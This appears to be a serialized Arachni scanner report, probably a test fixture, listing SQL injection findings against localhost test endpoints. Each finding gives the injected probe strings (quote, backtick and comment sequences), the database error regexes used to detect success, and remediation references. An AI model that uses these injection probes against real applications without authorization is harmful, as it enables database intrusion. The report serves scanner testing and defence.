{} method: GET response: ! 
'Warning: ibase_ Unexpected end of command in statement ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NjI= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxMjo0NiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: cookie2 url: http://localhost:7362/interbase/cookie/append elem: cookie method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:Unexpected end of command in statement) :match: Unexpected end of command in statement :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ) :altered: !binary |- Y29va2llMg== :element: cookie :params: {} :follow_location: true :cookies: !binary "Y29va2llMg==": cookie value) :injected: cookie value) :combo: !binary "Y29va2llMg==": cookie value) :action: http://localhost:7362/interbase/cookie/append :verification: :id: Unexpected end of command in statement var: cookie2 url: http://localhost:7362/interbase/cookie/append injected: cookie value) id: Unexpected end of command in statement regexp: (?i-mx:Unexpected end of command in statement) regexp_match: Unexpected end of command in statement elem: cookie remarks: {} method: GET response: ! 
'Warning: ibase_ Unexpected end of command in statement ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value) response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NjI= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxMjo0OCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: Parameter flip url: http://localhost:7362/interbase/cookie/flip elem: cookie method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:Unexpected end of command in statement) :match: Unexpected end of command in statement :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ) :altered: Parameter flip :element: cookie :params: {} :follow_location: true :cookies: ): !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :injected: '' :combo: ): !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :action: http://localhost:7362/interbase/cookie/flip :verification: :id: Unexpected end of command in statement var: Parameter flip url: http://localhost:7362/interbase/cookie/flip injected: '' id: Unexpected end of command in statement regexp: (?i-mx:Unexpected end of command in statement) regexp_match: Unexpected end of command in statement elem: cookie remarks: {} method: GET response: ! 
'[nil, "Warning: ibase_\nUnexpected end of command in statement\n"]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;)=95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59 response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NzM= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxMjo0OSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: User-Agent url: http://localhost:7362/interbase/header/append elem: header method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:Unexpected end of command in statement) :match: Unexpected end of command in statement :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ! '''`--' :altered: User-Agent :element: header :params: :follow_location: true :headers: User-Agent: arachni_user'`-- :injected: arachni_user'`-- :combo: User-Agent: arachni_user'`-- :action: http://localhost:7362/interbase/header/append :verification: :id: Unexpected end of command in statement var: User-Agent url: http://localhost:7362/interbase/header/append injected: arachni_user'`-- id: Unexpected end of command in statement regexp: (?i-mx:Unexpected end of command in statement) regexp_match: Unexpected end of command in statement elem: header remarks: {} method: GET response: ! 
'Warning: ibase_ Unexpected end of command in statement ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: arachni_user'`-- Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NjI= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxMjo1NSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: Parameter flip url: http://localhost:7362/interbase/header/flip elem: header method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:Unexpected end of command in statement) :match: Unexpected end of command in statement :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ! '''`--' :altered: Parameter flip :element: header :params: :follow_location: true :headers: ! '''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :injected: '' :combo: ! '''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :action: http://localhost:7362/interbase/header/flip :verification: :id: Unexpected end of command in statement var: Parameter flip url: http://localhost:7362/interbase/header/flip injected: '' id: Unexpected end of command in statement regexp: (?i-mx:Unexpected end of command in statement) regexp_match: Unexpected end of command in statement elem: header remarks: :stuff: - Blah - Blah2 method: GET response: ! '[nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, "Warning: ibase_\nUnexpected end of command in statement\n", nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev ! 
'''`--': 95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59 Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjE4 !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxMzowMiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: input url: http://localhost:7362/postgresql/form/append elem: form method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:PostgreSQL query failed:) :match: ! 'PostgreSQL query failed:' :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :param_flip: true :injected_orig: ) :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": default) :follow_location: true :injected: default) :combo: !binary "aW5wdXQ=": default) :action: http://localhost:7362/postgresql/form/append :verification: :id: ! 'PostgreSQL query failed:' var: input url: http://localhost:7362/postgresql/form/append injected: default) id: ! 'PostgreSQL query failed:' regexp: (?i-mx:PostgreSQL query failed:) regexp_match: ! 'PostgreSQL query failed:' elem: form remarks: {} method: GET response: ! 
'PostgreSQL query failed: supplied argument is not a valid PostgreSQL result pg_query() [: pg_exec() [: PostgreSQL.*ERROR Warning stuff pg_ stuff valid PostgreSQL result ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTY5 !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxMzowOCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: Parameter flip url: http://localhost:7362/postgresql/form/flip elem: form method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:PostgreSQL query failed:) :match: ! 'PostgreSQL query failed:' :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :param_flip: true :injected_orig: ! '''`--' :altered: Parameter flip :element: form :params: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdA== ! '''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :follow_location: true :injected: '' :combo: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdA== ! '''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :action: http://localhost:7362/postgresql/form/flip :verification: :id: ! 'PostgreSQL query failed:' var: Parameter flip url: http://localhost:7362/postgresql/form/flip injected: '' id: ! 'PostgreSQL query failed:' regexp: (?i-mx:PostgreSQL query failed:) regexp_match: ! 'PostgreSQL query failed:' elem: form remarks: {} method: GET response: ! 
'["PostgreSQL query failed:\nsupplied argument is not a valid PostgreSQL result\npg_query() [:\npg_exec() [:\nPostgreSQL.*ERROR\nWarning stuff pg_ stuff\nvalid PostgreSQL result\n", nil]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTg1 !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxMzowOCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: input url: http://localhost:7362/postgresql/link/append?input=default elem: link method: GET name: SQL Injection description: SQL code can be injected into the web application. 
tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:PostgreSQL query failed:) :match: ! 'PostgreSQL query failed:' :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :param_flip: true :injected_orig: ! '''`--' :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": default'`-- :follow_location: true :injected: default'`-- :combo: !binary "aW5wdXQ=": default'`-- :action: http://localhost:7362/postgresql/link/append?input=default :verification: :id: ! 'PostgreSQL query failed:' var: input url: http://localhost:7362/postgresql/link/append?input=default injected: default'`-- id: ! 'PostgreSQL query failed:' regexp: (?i-mx:PostgreSQL query failed:) regexp_match: ! 'PostgreSQL query failed:' elem: link remarks: {} method: GET response: ! 
'PostgreSQL query failed: supplied argument is not a valid PostgreSQL result pg_query() [: pg_exec() [: PostgreSQL.*ERROR Warning stuff pg_ stuff valid PostgreSQL result ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTY5 !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxMzoxMCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: true references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: Parameter flip url: http://localhost:7362/postgresql/link/flip?input=default elem: link method: GET name: SQL Injection description: SQL code can be injected into the web application. 
tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: true references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:PostgreSQL query failed:) :match: ! 'PostgreSQL query failed:' :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :param_flip: true :injected_orig: ) :altered: Parameter flip :element: link :params: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdA== ): !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :follow_location: true :injected: '' :combo: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdA== ): !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :action: http://localhost:7362/postgresql/link/flip?input=default :verification: :id: ! 'PostgreSQL query failed:' var: Parameter flip url: http://localhost:7362/postgresql/link/flip?input=default injected: '' id: ! 'PostgreSQL query failed:' regexp: (?i-mx:PostgreSQL query failed:) regexp_match: ! 'PostgreSQL query failed:' elem: link remarks: {} method: GET response: ! 
'["PostgreSQL query failed:\nsupplied argument is not a valid PostgreSQL result\npg_query() [:\npg_exec() [:\nPostgreSQL.*ERROR\nWarning stuff pg_ stuff\nvalid PostgreSQL result\n", nil]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTg1 !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxMzoxMCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: 